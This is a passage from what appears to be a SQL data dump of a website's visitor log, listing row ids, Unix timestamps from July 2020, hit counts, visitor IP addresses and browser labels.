70.69','chrome'),(518832,1593626166,3,3,0,0,'51.68.11.195','chrome'),(518833,1593626186,2,2,0,0,'51.77.125.148','chrome'),(518834,1593626210,1,1,0,0,'204.93.178.58','chrome'),(518835,1593626402,8,8,0,0,'185.11.82.228','other'),(518836,1593626539,1,1,0,0,'157.55.39.64','other'),(518837,1593627083,1,1,0,0,'178.154.200.222','other'),(518838,1593627112,1,1,0,0,'17.58.99.7','other'),(518839,1593627464,1,1,0,0,'66.249.70.69','chrome'),(518840,1593627524,2,2,0,0,'31.177.95.171','chrome'),(518841,1593627622,2,2,0,0,'198.71.235.25','chrome'),(518842,1593627854,1,1,0,0,'66.249.70.70','chrome'),(518843,1593627930,1,1,0,0,'144.217.183.134','chrome'),(518844,1593627959,2,2,0,0,'115.94.13.52','chrome'),(518845,1593628100,2,2,0,0,'192.185.81.183','chrome'),(518846,1593628745,1,1,0,0,'157.55.39.64','other'),(518847,1593628982,8,8,0,0,'185.11.82.228','other'),(518848,1593630456,2,2,0,0,'139.162.30.117','chrome'),(518849,1593630686,1,1,0,0,'66.249.70.70','chrome'),(518850,1593630858,8,8,0,0,'185.11.82.228','other'),(518851,1593630963,1,1,0,0,'163.172.13.164','chrome'),(518852,1593631081,1,1,0,0,'66.249.70.69','chrome'),(518853,1593631598,1,1,0,0,'192.35.168.209','other'),(518854,1593631894,1,1,0,0,'192.35.168.203','other'),(518855,1593632030,1,1,0,0,'91.196.178.23','chrome'),(518856,1593632082,1,1,0,0,'185.208.164.148','chrome'),(518857,1593632171,3,3,0,0,'128.199.65.117','chrome'),(518858,1593632176,1,1,0,0,'81.88.49.51','chrome'),(518859,1593632180,1,1,0,0,'81.88.49.46','chrome'),(518860,1593632270,2,2,0,0,'51.68.11.203','chrome'),(518861,1593633119,1,1,0,0,'66.249.70.72','chrome'),(518862,1593633412,1,1,0,0,'157.55.39.107','other'),(518863,1593633432,8,8,0,0,'185.11.82.228','other'),(518864,1593633838,1,1,0,0,'149.202.196.101','chrome'),(518865,1593634100,1,1,0,0,'192.35.168.252','other'),(518866,1593634116,1,0,1,0,'66.249.70.69',''),(518867,1593634285,4,4,0,0,'66.249.70.70','chrome'),(518868,1593634455,1,1,0,0,'185.5.236.191','chrome'),(518869,1593634682,1,1,0,0,'66.249.64.38','chrome'),(518870,1593634768,2,2,0,0,'91.209.11.236','other'),(518871,1593635103,1,1,0,0,'8.29.198.26','other'),(518872,1593635248,1,1,0,0,'8.29.198.25','other'),(518873,1593635416,2,2,0,0,'46.37.171.183','chrome'),(518874,1593635456,1,1,0,0,'37.192.137.95','chrome'),(518875,1593635903,1,1,0,0,'17.58.99.7','other'),(518876,1593635918,1,1,0,0,'157.55.39.58','other'),(518877,1593636188,1,1,0,0,'66.249.64.36','chrome'),(518878,1593636200,8,8,0,0,'185.11.82.228','other'),(518879,1593636823,3,3,0,0,'51.68.11.203','chrome'),(518880,1593637005,1,1,0,0,'89.46.106.231','chrome'),(518881,1593637007,1,1,0,0,'89.145.92.148','chrome'),(518882,1593637182,2,2,0,0,'142.44.188.0','chrome'),(518883,1593637255,1,1,0,0,'17.58.99.7','other'),(518884,1593637393,1,1,0,0,'193.58.104.215','chrome'),(518885,1593637733,1,1,0,0,'66.249.70.72','chrome'),(518886,1593638186,1,1,0,0,'66.249.70.69','chrome'),(518887,1593638311,1,1,0,0,'51.68.11.227','chrome'),(518888,1593638745,8,8,0,0,'185.11.82.228','other'),(518889,1593639024,1,1,0,0,'66.249.64.38','chrome'),(518890,1593639779,2,2,0,0,'193.177.165.28','chrome'),(518891,1593639872,1,1,0,0,'51.68.11.231','chrome'),(518892,1593640406,2,2,0,0,'66.249.70.72','chrome'),(518893,1593640586,1,1,0,0,'66.249.70.69','chrome'),(518894,1593641335,8,8,0,0,'185.11.82.228','other'),(518895,1593641436,2,2,0,0,'91.208.99.2','chrome'),(518896,1593641649,2,2,0,0,'66.249.70.69','chrome'),(518897,1593641957,1,1,0,0,'157.55.39.107','other'),(518898,1593642109,1,1,0,0,'157.55.39.64','other'),(518899,1593642695,1,1,0,0,'66.249.70.72','chrome'),(518900,1593642884,2,2,0,0,'51.68.11.211','chrome'),(518901,1593642915,2,2,0,0,'91.208.99.2','chrome'),(518902,1593642931,5,5,0,0,'95.47.155.21','chrome'),(518903,1593643051,1,1,0,0,'66.249.70.70','chrome'),(518904,1593643335,1,1,0,0,'17.58.99.7','other'),(518905,1593643901,1,1,0,0,'66.249.70.69','chrome'),(518906,1593643982,8,8,0,0,'185.11.82.228','other'),(518907,1593644253,1,1,0,0,'213.180.203.122','chrome'),(518908,1593644392,2,2,0,0,'45.32.106.150','chrome'),(518909,1593644417,1,1,0,0,'66.249.70.70','chrome'),(518910,1593644441,2,2,0,0,'35.214.244.174','chrome'),(518911,1593644481,1,1,0,0,'51.68.11.199','chrome'),(518912,1593644504,2,2,0,0,'178.154.200.92','chrome'),(518913,1593644902,1,1,0,0,'154.81.86.238','chrome'),(518914,1593644911,1,1,0,0,'178.154.200.222','chrome'),(518915,1593645141,1,1,0,0,'213.180.203.16','chrome'),(518916,1593645323,2,2,0,0,'178.154.200.216','chrome'),(518917,1593645680,1,1,0,0,'89.46.107.212','chrome'),(518918,1593645793,3,3,0,0,'128.199.65.117','chrome'),(518919,1593645833,1,1,0,0,'89.46.105.252','chrome'),(518920,1593645938,1,1,0,0,'8.29.198.25','other'),(518921,1593646037,2,2,0,0,'51.68.11.215','chrome'),(518922,1593646084,1,1,0,0,'8.29.198.27','other'),(518923,1593646123,1,1,0,0,'157.55.39.107','other'),(518924,1593646166,2,2,0,0,'66.249.70.69','chrome'),(518925,1593646403,1,1,0,0,'178.154.200.196','other'),(518926,1593646423,1,1,0,0,'213.180.203.17','chrome'),(518927,1593646480,1,1,0,0,'66.249.70.70','chrome'),(518928,1593646961,8,8,0,0,'185.11.82.228','other'),(518929,1593646999,1,1,0,0,'213.180.203.95','chrome'),(518930,1593647300,2,2,0,0,'178.154.200.196','chrome'),(518931,1593647347,1,1,0,0,'89.46.107.212','chrome'),(518932,1593647423,1,1,0,0,'35.213.146.206','chrome'),(518934,1593647464,2,2,0,0,'51.68.11.227','chrome'),(518935,1593647706,1,1,0,0,'62.205.134.182','other'),(518936,1593647869,1,1,0,0,'37.192.137.95','firefox'),(518937,1593648114,1,1,0,0,'66.249.64.38','chrome'),(518938,1593648215,1,1,0,0,'66.249.70.70','chrome'),(518939,1593648278,1,1,0,0,'213.180.203.16','chrome'),(518940,1593648453,1,1,0,0,'66.249.70.69','chrome'),(518941,1593648497,2,2,0,0,'50.62.161.240','chrome'),(518942,1593648818,1,1,0,0,'88.99.105.216','chrome'),(518943,1593648834,1,1,0,0,'178.154.200.222','other'),(518944,1593648914,1,1,0,0,'87.236.20.17','chrome'),(518945,1593648960,3,3,0,0,'222.122.60.18','chrome'),(518946,1593649043,1,1,0,0,'178.154.200.236','chrome'),(518947,1593649098,2,2,0,0,'198.38.82.11','chrome'),(518948,1593649173,2,2,0,0,'192.185.81.239','chrome'),(518949,1593649296,1,1,0,0,'178.154.200.220','chrome'),(518950,1593649432,1,1,0,0,'66.249.70.69','chrome'),(518951,1593649458,1,1,0,0,'213.180.203.95','chrome'),(518952,1593649466,1,1,0,0,'66.249.64.38','chrome'),(518953,1593649494,2,2,0,0,'66.249.70.70','chrome'),(518954,1593649970,1,1,0,0,'178.154.200.196','chrome'),(518955,1593650120,8,8,0,0,'185.11.82.228','other'),(518956,1593650788,1,1,0,0,'178.154.200.41','chrome'),(518957,1593651459,2,2,0,0,'66.249.70.72','chrome'),(518958,1593651538,1,1,0,0,'66.249.70.70','chrome'),(518959,1593651753,2,2,0,0,'51.68.11.215','chrome'),(518960,1593651754,1,1,0,0,'87.236.20.49','chrome'),(518961,1593651826,1,1,0,0,'51.68.11.231','chrome'),(518962,1593651890,1,1,0,0,'88.198.177.113','chrome'),(518963,1593652075,1,1,0,0,'178.154.200.222','other'),(518964,1593652440,1,1,0,0,'178.154.200.220','chrome'),(518965,1593652553,1,1,0,0,'54.36.149.51','other'),(518966,1593652745,3,3,0,0,'213.180.203.16','chrome'),(518967,1593652841,2,2,0,0,'66.249.70.69','chrome'),(518968,1593652948,1,1,0,0,'66.249.64.33','chrome'),(518969,1593653016,1,1,0,0,'66.249.64.38','chrome'),(518970,1593653403,1,1,0,0,'85.25.237.25','chrome'),(518971,1593653454,2,2,0,0,'188.166.218.146','chrome'),(518972,1593653877,8,8,0,0,'185.11.82.228','other'),(518973,1593653909,1,1,0,0,'185.5.236.191','chrome'),(518974,1593653912,1,1,0,0,'178.154.200.196','other'),(518975,1593654211,1,1,0,0,'178.154.200.97','chrome'),(518976,1593654471,1,1,0,0,'178.154.200.220','chrome'),(518977,1593654645,1,1,0,0,'193.177.165.28','chrome'),(518978,1593654844,1,1,0,0,'89.46.105.229','chrome'),(518979,1593654943,1,1,0,0,'178.154.200.196','chrome'),(518980,1593654962,2,2,0,0,'66.249.70.72','chrome'),(518981,1593655350,1,1,0,0,'213.180.203.16','chrome'),(518982,1593656104,1,1,0,0,'46.252.205.142','chrome'),(518983,1593656298,1,1,0,0,'41.203.16.122','chrome'),(518984,1593656314,1,1,0,0,'178.154.200.216','chrome'),(518985,1593656490,1,1,0,0,'66.249.70.69','chrome'),(518986,1593656511,1,1,0,0,'66.249.70.70','chrome'),(518987,1593656632,1,1,0,0,'195.248.240.19','chrome'),(518988,1593656681,2,2,0,0,'210.245.94.147','chrome'),(518989,1593656768,1,1,0,0,'8.29.198.25','other'),(518990,1593656913,1,1,0,0,'8.29.198.27','other'),(518991,1593657108,1,1,0,0,'213.180.203.95','chrome'),(518992,1593657719,1,1,0,0,'178.154.200.220','chrome'),(518993,1593657725,2,2,0,0,'66.249.70.70','chrome'),(518994,1593657765,2,2,0,0,'178.154.200.97','chrome'),(518995,1593657876,1,1,0,0,'17.58.99.7','other'),(518996,1593657894,1,1,0,0,'178.154.200.222','chrome'),(518997,1593657955,8,8,0,0,'185.11.82.228','other'),(518998,1593658244,1,1,0,0,'178.154.200.236','chrome'),(518999,1593658642,2,2,0,0,'66.249.70.72','chrome'),(519000,1593658826,1,1,0,0,'178.154.200.49','chrome'),(519001,1593658913,1,1,0,0,'178.154.200.131','chrome'),(519002,1593659114,1,1,0,0,'51.68.11.211','chrome'),(519003,1593659225,2,2,0,0,'157.230.255.113','chrome'),(519004,1593659228,1,1,0,0,'178.154.200.92','chrome'),(519005,1593659229,1,1,0,0,'66.249.70.69','chrome'),(519006,1593659305,1,1,0,0,'213.180.203.140','chrome'),(519007,1593659318,1,1,0,0,'195.74.38.173','chrome'),(519008,1593659410,1,1,0,0,'198.38.82.11','chrome'),(519009,1593659507,1,1,0,0,'213.180.203.95','chrome'),(519010,1593659562,2,2,0,0,'51.68.11.199','chrome'),(519011,1593659653,1,1,0,0,'213.180.203.17','chrome'),(519012,1593660440,1,1,0,0,'157.55.39.64','other'),(519013,1593660569,1,1,0,0,'178.154.200.72','other'),(519014,1593660735,2,2,0,0,'66.249.70.72','chrome'),(519015,1593660940,7,7,0,0,'95.47.155.21','chrome'),(519016,1593660967,1,1,0,0,'66.249.70.70','chrome'),(519017,1593660973,2,2,0,0,'62.210.185.4','chrome'),(519018,1593661350,1,1,0,0,'213.180.203.16','other'),(519019,1593661355,1,1,0,0,'178.154.200.236','chrome'),(519020,1593661581,1,1,0,0,'66.249.70.69','chrome'),(519021,1593662037,1,1,0,0,'213.180.203.171','chrome'),(519022,1593662270,1,1,0,0,'213.180.203.109','chrome'),(519023,1593662304,2,2,0,0,'104.207.233.143','chrome'),(519024,1593662325,1,1,0,0,'43.255.152.7','chrome'),(519025,1593662340,1,1,0,0,'70.32.23.26','chrome'),(519026,1593662386,1,1,0,0,'66.249.70.70','chrome'),(519027,1593662490,1,1,0,0,'178.154.200.112','chrome'),(519028,1593662598,1,1,0,0,'178.154.200.231','chrome'),(519029,1593663005,1,1,0,0,'213.180.203.81','chrome'),(519030,1593663174,1,1,0,0,'66.249.64.33','chrome'),(519031,1593663233,1,1,0,0,'178.154.200.245','chrome'),(519032,1593663298,1,1,0,0,'66.249.70.70','chrome'),(519033,1593663440,8,8,0,0,'185.11.82.228','other'),(519034,1593663638,1,1,0,0,'66.249.70.69','chrome'),(519035,1593663656,1,1,0,0,'103.201.69.226','chrome'),(519036,1593663737,1,1,0,0,'66.249.64.36','chrome'),(519037,1593664236,1,1,0,0,'85.25.237.25','chrome'),(519038,1593664466,1,1,0,0,'178.154.200.112','chrome'),(519039,1593664507,1,1,0,0,'17.58.99.7','other'),(519040,1593664637,2,2,0,0,'66.249.70.72','chrome'),(519041,1593665058,1,1,0,0,'213.180.203.16','chrome'),(519042,1593665122,1,1,0,0,'66.249.70.70','chrome'),(519043,1593665252,3,3,0,0,'128.199.65.117','chrome'),(519044,1593665396,2,2,0,0,'52.206.118.20','chrome'),(519045,1593665458,1,1,0,0,'213.180.203.140','chrome'),(519046,1593665462,1,1,0,0,'178.154.200.216','chrome'),(519047,1593665492,1,1,0,0,'178.154.200.222','chrome'),(519048,1593665542,1,1,0,0,'62.205.134.182','other'),(519049,1593665551,1,1,0,0,'17.58.99.7','other'),(519050,1593665568,3,3,0,0,'62.210.185.4','chrome'),(519051,1593665695,1,1,0,0,'178.154.200.196','chrome'),(519052,1593665797,1,1,0,0,'213.180.203.142','chrome'),(519053,1593666080,2,2,0,0,'66.249.70.72','chrome'),(519054,1593666108,1,1,0,0,'194.61.24.94','other'),(519055,1593666176,2,2,0,0,'66.249.70.69','chrome'),(519056,1593666192,1,1,0,0,'178.154.200.236','chrome'),(519057,1593666731,1,1,0,0,'195.248.240.19','chrome'),(519058,1593666746,1,1,0,0,'213.180.203.16','chrome'),(519059,1593666883,2,2,0,0,'5.144.130.20','chrome'),(519060,1593666949,1,1,0,0,'77.246.156.194','chrome'),(519061,1593667603,1,1,0,0,'8.29.198.25','other'),(519062,1593667738,1,1,0,0,'8.29.198.27','other'),(519063,1593667884,1,1,0,0,'66.249.64.38','chrome'),(519064,1593668141,1,1,0,0,'66.249.70.69','chrome'),(519065,1593668193,1,1,0,0,'213.180.203.122','chrome'),(519066,1593668219,2,2,0,0,'192.145.239.13','chrome'),(519067,1593668422,2,2,0,0,'149.255.62.97','chrome'),(519068,1593668455,2,2,0,0,'192.169.197.207','chrome'),(519069,1593668514,2,2,0,0,'45.13.160.146','chrome'),(519070,1593668805,1,1,0,0,'91.196.178.82','chrome'),(519071,1593669186,1,1,0,0,'46.242.145.104','chrome'),(519072,1593669490,1,1,0,0,'213.180.203.16','chrome'),(519073,1593669505,1,1,0,0,'178.154.200.222','other'),(519074,1593669564,2,2,0,0,'66.249.70.69','chrome'),(519075,1593669698,1,1,0,0,'176.59.2.60','other'),(519076,1593669859,4,4,0,0,'128.199.65.117','chrome'),(519077,1593669957,2,2,0,0,'45.76.213.227','chrome'),(519078,1593669959,2,2,0,0,'51.68.11.195','chrome'),(519079,1593669985,1,1,0,0,'212.158.174.121','chrome'),(519080,1593670024,1,1,0,0,'89.46.105.252','chrome'),(519081,1593670887,1,1,0,0,'213.180.203.54','chrome'),(519082,1593671051,1,1,0,0,'17.58.99.7','other'),(519083,1593671165,1,1,0,0,'195.74.38.173','chrome'),(519084,1593671197,1,1,0,0,'66.249.70.72','chrome'),(519085,1593671414,1,1,0,0,'178.154.200.216','chrome'),(519086,1593671466,1,1,0,0,'85.50.124.107','chrome'),(519087,1593671544,2,2,0,0,'128.199.65.117','chrome'),(519088,1593671560,1,1,0,0,'178.154.200.222','other'),(519089,1593671611,1,1,0,0,'81.88.49.35','chrome'),(519090,1593671623,1,1,0,0,'178.159.37.88','chrome'),(519091,1593671649,1,1,0,0,'81.88.49.43','chrome'),(519092,1593672031,1,1,0,0,'66.249.70.70','chrome'),(519093,1593672130,4,4,0,0,'66.249.70.69','chrome'),(519094,1593672548,1,1,0,0,'178.154.200.112','chrome'),(519095,1593672595,1,1,0,0,'66.249.70.72','chrome'),(519096,1593672682,2,2,0,0,'45.199.109.170','chrome'),(519097,1593672811,2,2,0,0,'37.17.224.121','chrome'),(519098,1593673076,1,1,0,0,'66.249.70.69','chrome'),(519099,1593673672,1,1,0,0,'178.154.200.222','other'),(519100,1593673677,1,1,0,0,'66.249.70.72','chrome'),(519101,1593673938,2,2,0,0,'66.249.70.70','chrome'),(519102,1593674234,8,8,0,0,'185.11.82.228','other'),(519103,1593674366,1,1,0,0,'66.249.64.33','chrome'),(519104,1593674752,1,1,0,0,'178.154.200.222','chrome'),(519105,1593674780,1,1,0,0,'213.180.203.16','chrome'),(519106,1593674795,1,1,0,0,'89.46.106.231','chrome'),(519107,1593674919,5,5,0,0,'103.254.148.111','chrome'),(519108,1593675136,1,1,0,0,'157.55.39.58','other'),(519109,1593675178,1,1,0,0,'66.249.70.72','chrome'),(519110,1593675402,2,2,0,0,'178.154.200.112','chrome'),(519111,1593675423,3,3,0,0,'66.249.70.70','chrome'),(519112,1593675493,2,2,0,0,'66.249.70.69','chrome'),(519113,1593675637,1,1,0,0,'178.154.200.97','chrome'),(519114,1593675842,2,2,0,0,'156.67.237.84','chrome'),(519115,1593675843,1,1,0,0,'178.154.200.220','chrome'),(519116,1593675848,1,1,0,0,'213.180.203.122','chrome'),(519117,1593675864,1,1,0,0,'157.55.39.64','other'),(519118,1593675937,2,2,0,0,'185.182.56.85','chrome'),(519119,1593676211,1,1,0,0,'89.46.105.252','chrome'),(519120,1593676401,1,1,0,0,'178.154.200.236','chrome'),(519121,1593676474,1,1,0,0,'178.154.200.222','other'),(519122,1593676542,1,1,0,0,'178.154.200.196','chrome'),(519123,1593676614,2,2,0,0,'213.180.203.16','chrome'),(519124,1593676667,1,1,0,0,'91.196.178.82','chrome'),(519125,1593676816,1,1,0,0,'66.249.70.72','chrome'),(519126,1593677017,3,3,0,0,'66.249.70.69','chrome'),(519127,1593677048,3,3,0,0,'66.249.70.70','chrome'),(519128,1593677050,1,1,0,0,'157.55.39.58','other'),(519129,1593677090,1,1,0,0,'66.249.64.38','chrome'),(519130,1593677262,1,1,0,0,'178.154.200.220','chrome'),(519131,1593677394,1,1,0,0,'89.46.104.200','chrome'),(519132,1593677420,1,1,0,0,'186.234.80.88','chrome'),(519133,1593677511,2,2,0,0,'51.68.11.215','chrome'),(519134,1593677658,1,1,0,0,'91.196.178.86','chrome'),(519135,1593677737,1,1,0,0,'66.249.70.72','chrome'),(519136,1593678432,1,1,0,0,'8.29.198.25','other'),(519137,1593678569,1,1,0,0,'8.29.198.26','other'),(519138,1593678570,4,4,0,0,'66.249.70.69','chrome'),(519139,1593678574,1,1,0,0,'178.154.200.97','other'),(519140,1593678588,1,1,0,0,'178.154.200.222','other'),(519141,1593678753,1,1,0,0,'66.249.64.36','chrome'),(519142,1593678836,2,2,0,0,'17.58.99.7','other'),(519143,1593678878,1,1,0,0,'213.180.203.16','chrome'),(519144,1593678988,1,1,0,0,'157.55.39.64','other'),(519145,1593679219,1,1,0,0,'66.249.64.38','chrome'),(519146,1593679220,2,2,0,0,'66.249.70.72','chrome'),(519147,1593679892,1,1,0,0,'62.210.111.97','chrome'),(519148,1593680205,1,1,0,0,'89.46.105.154','chrome'),(519149,1593680262,1,1,0,0,'192.157.230.165','chrome'),(519150,1593680286,2,2,0,0,'45.13.160.146','chrome'),(519151,1593680344,1,1,0,0,'66.249.70.70','chrome'),(519152,1593680374,1,1,0,0,'178.208.83.57','chrome'),(519153,1593680427,2,2,0,0,'192.198.92.114','chrome'),(519154,1593680432,1,1,0,0,'144.217.158.133','chrome'),(519155,1593680455,1,1,0,0,'131.220.6.152','chrome'),(519156,1593681063,2,2,0,0,'66.249.70.69','chrome'),(519157,1593681367,1,1,0,0,'2.47.39.210','other'),(519158,1593681769,1,1,0,0,'51.68.11.195','chrome'),(519159,1593681792,1,1,0,0,'66.249.70.72','chrome'),(519160,1593681832,1,1,0,0,'91.196.178.177','chrome'),(519161,1593681862,2,2,0,0,'88.198.177.113','chrome'),(519162,1593681903,1,1,0,0,'89.46.105.246','chrome'),(519163,1593682363,2,2,0,0,'66.249.70.70','chrome'),(519164,1593682675,2,2,0,0,'66.249.70.69','chrome'),(519165,1593683442,2,2,0,0,'167.172.174.199','chrome'),(519166,1593683567,1,1,0,0,'81.88.49.50','chrome'),(519167,1593683655,2,2,0,0,'66.249.70.70','chrome'),(519168,1593683821,1,1,0,0,'31.177.95.153','chrome'),(519169,1593683940,1,1,0,0,'66.249.70.69','chrome'),(519170,1593684071,1,1,0,0,'3.236.150.216','chrome'),(519171,1593684498,1,1,0,0,'66.249.70.72','chrome'),(519172,1593684686,1,1,0,0,'178.154.200.220','other'),(519173,1593684702,1,1,0,0,'213.180.203.16','chrome'),(519174,1593684828,2,2,0,0,'51.68.11.211','chrome'),(519175,1593685028,1,1,0,0,'66.249.70.69','chrome'),(519176,1593685106,1,1,0,0,'178.154.200.222','chrome'),(519177,1593685159,1,1,0,0,'185.94.230.126','chrome'),(519178,1593685246,1,1,0,0,'157.55.39.106','other'),(519179,1593685640,1,1,0,0,'66.249.64.38','chrome'),(519180,1593685702,1,1,0,0,'178.154.200.220','other'),(519181,1593686181,2,2,0,0,'115.94.13.52','chrome'),(519182,1593686255,2,2,0,0,'115.146.122.250','chrome'),(519183,1593686800,2,2,0,0,'66.249.70.70','chrome'),(519184,1593686811,1,1,0,0,'178.154.200.97','chrome'),(519185,1593687130,1,1,0,0,'109.74.154.72','chrome'),(519186,1593687299,1,1,0,0,'66.249.70.72','chrome'),(519187,1593687352,2,2,0,0,'66.249.70.69','chrome'),(519188,1593687457,1,1,0,0,'178.154.200.196','chrome'),(519189,1593687494,1,1,0,0,'78.24.179.226','chrome'),(519190,1593687715,1,1,0,0,'45.13.160.146','chrome'),(519191,1593687868,4,4,0,0,'51.68.11.231','chrome'),(519192,1593688172,1,1,0,0,'178.154.200.114','chrome'),(519193,1593688235,1,1,0,0,'102.130.112.235','chrome'),(519194,1593688256,2,1,1,0,'66.249.70.69',''),(519195,1593688272,1,1,0,0,'178.154.200.92','chrome'),(519196,1593688404,2,2,0,0,'66.249.64.36','chrome'),(519197,1593688447,1,1,0,0,'66.249.64.38','chrome'),(519198,1593688538,1,1,0,0,'66.249.70.72','chrome'),(519199,1593688940,5,5,0,0,'66.249.70.69','chrome'),(519200,1593688994,1,1,0,0,'178.154.200.229','chrome'),(519201,1593689001,1,1,0,0,'178.154.200.245','chrome'),(519202,1593689011,3,3,0,0,'66.249.70.70','chrome'),(519203,1593689192,2,2,0,0,'51.68.11.211','chrome'),(519204,1593689218,2,2,0,0,'66.249.64.33','chrome'),(519205,1593689223,2,2,0,0,'160.153.154.159','chrome'),(519206,1593689254,2,2,0,0,'174.138.51.109','chrome'),(519207,1593689258,1,1,0,0,'8.29.198.25','other'),(519208,1593689394,1,1,0,0,'8.29.198.27','other'),(519209,1593689730,1,1,0,0,'88.198.117.8','chrome'),(519210,1593689974,1,1,0,0,'157.55.39.166','other'),(519211,1593690180,1,1,0,0,'213.180.203.95','chrome'),(519212,1593690326,1,1,0,0,'213.180.203.16','chrome'),(519213,1593690355,1,1,0,0,'46.133.164.94','chrome'),(519214,1593690599,4,4,0,0,'66.249.70.69','chrome'),(519215,1593690989,1,1,0,0,'213.180.203.17','chrome'),(519216,1593691007,1,1,0,0,'37.73.131.197','chrome'),(519217,1593691109,1,1,0,0,'66.249.64.36','chrome'),(519218,1593691297,1,1,0,0,'178.154.200.92','chrome'),(519219,1593691379,1,1,0,0,'178.154.200.236','chrome'),(519220,1593691416,1,1,0,0,'157.55.39.58','other'),(519221,1593691417,1,1,0,0,'66.249.64.33','chrome'),(519222,1593691483,1,1,0,0,'213.180.203.182','chrome'),(519223,1593691549,1,1,0,0,'66.249.70.70','chrome'),(519224,1593691777,1,1,0,0,'213.180.203.90','chrome'),(519225,1593691893,2,2,0,0,'66.249.70.72','chrome'),(519226,1593691942,1,1,0,0,'178.154.200.220','chrome'),(519227,1593692194,1,1,0,0,'46.63.117.100','chrome'),(519228,1593692345,2,2,0,0,'66.249.70.69','chrome'),(519229,1593692384,1,1,0,0,'213.180.203.17','chrome'),(519230,1593692527,1,1,0,0,'66.249.64.38','chrome'),(519231,1593692743,2,2,0,0,'66.249.70.70','chrome'),(519232,1593692747,1,1,0,0,'66.249.64.36','chrome'),(519233,1593692979,1,1,0,0,'178.154.200.222','other'),(519234,1593693096,8,8,0,0,'185.11.82.228','other'),(519235,1593693104,1,1,0,0,'178.154.200.196','chrome'),(519236,1593693517,1,1,0,0,'157.55.39.166','other'),(519237,1593693703,1,1,0,0,'88.155.144.175','chrome'),(519238,1593693842,1,1,0,0,'66.249.70.69','chrome'),(519239,1593693932,2,2,0,0,'213.180.203.16','other'),(519240,1593694044,1,1,0,0,'178.154.200.86','other'),(519241,1593694058,1,1,0,0,'178.154.200.86','chrome'),(519242,1593694322,1,1,0,0,'66.249.64.33','chrome'),(519243,1593694368,2,2,0,0,'66.249.70.70','chrome'),(519244,1593694706,2,2,0,0,'66.249.70.72','chrome'),(519245,1593694925,1,1,0,0,'213.180.203.16','chrome'),(519246,1593695054,8,8,0,0,'185.11.82.228','other'),(519247,1593695152,2,2,0,0,'66.249.64.38','chrome'),(519248,1593695161,1,1,0,0,'91.196.178.82','chrome'),(519249,1593695542,1,1,0,0,'178.154.200.196','chrome'),(519250,1593695556,1,1,0,0,'66.249.64.36','chrome'),(519251,1593695919,1,1,0,0,'213.180.203.90','other'),(519252,1593696089,1,1,0,0,'178.154.200.222','chrome'),(519253,1593696336,1,1,0,0,'178.154.200.28','chrome'),(519254,1593696790,2,2,0,0,'66.249.70.72','chrome'),(519255,1593697158,2,2,0,0,'66.249.70.69','chrome'),(519256,1593697274,1,1,0,0,'178.154.200.106','chrome'),(519257,1593697300,8,8,0,0,'185.11.82.228','other'),(519258,1593697320,1,1,0,0,'46.174.125.28','chrome'),(519259,1593697470,1,1,0,0,'178.154.200.236','chrome'),(519260,1593697675,1,1,0,0,'66.249.64.33','chrome'),(519261,1593697811,1,1,0,0,'213.180.203.16','chrome'),(519262,1593698175,1,1,0,0,'178.154.200.222','chrome'),(519263,1593698212,1,1,0,0,'195.10.210.70','firefox'),(519264,1593698440,1,1,0,0,'66.249.64.36','chrome'),(519265,1593698684,1,1,0,0,'178.154.200.222','other'),(519266,1593698826,1,1,0,0,'17.58.99.7','other'),(519267,1593698892,2,2,0,0,'66.249.70.69','chrome'),(519268,1593699014,1,1,0,0,'66.249.64.33','chrome'),(519269,1593699075,2,2,0,0,'66.249.70.72','chrome'),(519270,1593699851,8,8,0,0,'185.11.82.228','other'),(519271,1593699982,1,1,0,0,'66.249.70.70','chrome'),(519272,1593699991,1,1,0,0,'178.154.200.175','chrome'),(519273,1593700037,3,3,0,0,'66.249.70.69','chrome'),(519274,1593700094,1,1,0,0,'8.29.198.26','other'),(519275,1593700245,1,1,0,0,'8.29.198.27','other'),(519276,1593700993,1,1,0,0,'17.58.99.7','other'),(519277,1593701160,1,1,0,0,'66.249.64.38','chrome'),(519278,1593701174,1,1,0,0,'178.154.200.196','chrome'),(519279,1593701379,2,2,0,0,'213.180.203.16','chrome'),(519280,1593701472,1,1,0,0,'178.154.200.220','chrome'),(519281,1593701492,3,3,0,0,'66.249.70.72','chrome'),(519282,1593701600,1,1,0,0,'66.249.70.69','chrome'),(519283,1593701683,2,2,0,0,'66.249.70.70','chrome'),(519284,1593701723,2,2,0,0,'178.154.200.222','chrome'),(519285,1593701782,1,1,0,0,'66.249.64.33','chrome'),(519286,1593701833,2,2,0,0,'80.240.20.214','other'),(519287,1593702348,1,1,0,0,'178.154.200.222','other'),(519288,1593702432,2,2,0,0,'178.154.200.196','chrome'),(519289,1593702644,1,1,0,0,'178.154.200.97','chrome'),(519290,1593702653,1,1,0,0,'178.154.200.222','chrome'),(519291,1593702931,1,1,0,0,'178.154.200.92','chrome'),(519292,1593703071,1,1,0,0,'178.154.200.236','chrome'),(519293,1593703296,8,8,0,0,'185.11.82.228','other'),(519294,1593703325,2,2,0,0,'66.249.70.72','chrome'),(519295,1593703351,1,1,0,0,'213.180.203.81','chrome'),(519296,1593703599,1,1,0,0,'66.249.70.70','chrome'),(519297,1593703697,2,2,0,0,'66.249.64.36','chrome'),(519298,1593703882,1,1,0,0,'178.154.200.196','chrome'),(519299,1593704112,1,1,0,0,'178.154.200.236','chrome'),(519300,1593704992,1,1,0,0,'178.154.200.22','chrome'),(519301,1593705170,1,1,0,0,'178.154.200.220','chrome'),(519302,1593705461,1,1,0,0,'213.180.203.17','chrome'),(519303,1593705522,1,1,0,0,'178.154.200.222','chrome'),(519304,1593705564,1,1,0,0,'178.154.200.97','chrome'),(519305,1593705585,2,2,0,0,'66.249.70.70','chrome'),(519306,1593705735,1,1,0,0,'17.58.99.7','other'),(519307,1593705909,1,1,0,0,'66.249.70.69','chrome'),(519308,1593706350,1,1,0,0,'46.101.165.105','chrome'),(519309,1593706518,2,2,0,0,'213.180.203.16','chrome'),(519310,1593706521,1,1,0,0,'213.180.203.95','chrome'),(519311,1593707209,1,1,0,0,'213.180.203.192','chrome'),(519312,1593707273,2,2,0,0,'66.249.64.38','chrome'),(519313,1593707600,8,8,0,0,'185.11.82.228','other'),(519314,1593707751,1,1,0,0,'213.180.203.122','chrome'),(519315,1593708091,1,1,0,0,'178.154.200.92','chrome'),(519316,1593708356,2,2,0,0,'178.154.200.236','chrome'),(519317,1593708376,2,0,2,0,'66.249.64.33',''),(519318,1593708456,2,2,0,0,'178.154.200.220','chrome'),(519319,1593708600,1,1,0,0,'66.249.70.72','chrome'),(519320,1593708806,1,1,0,0,'178.154.200.236','other'),(519321,1593709043,1,1,0,0,'213.180.203.95','chrome'),(519322,1593709382,1,1,0,0,'46.33.33.84','chrome'),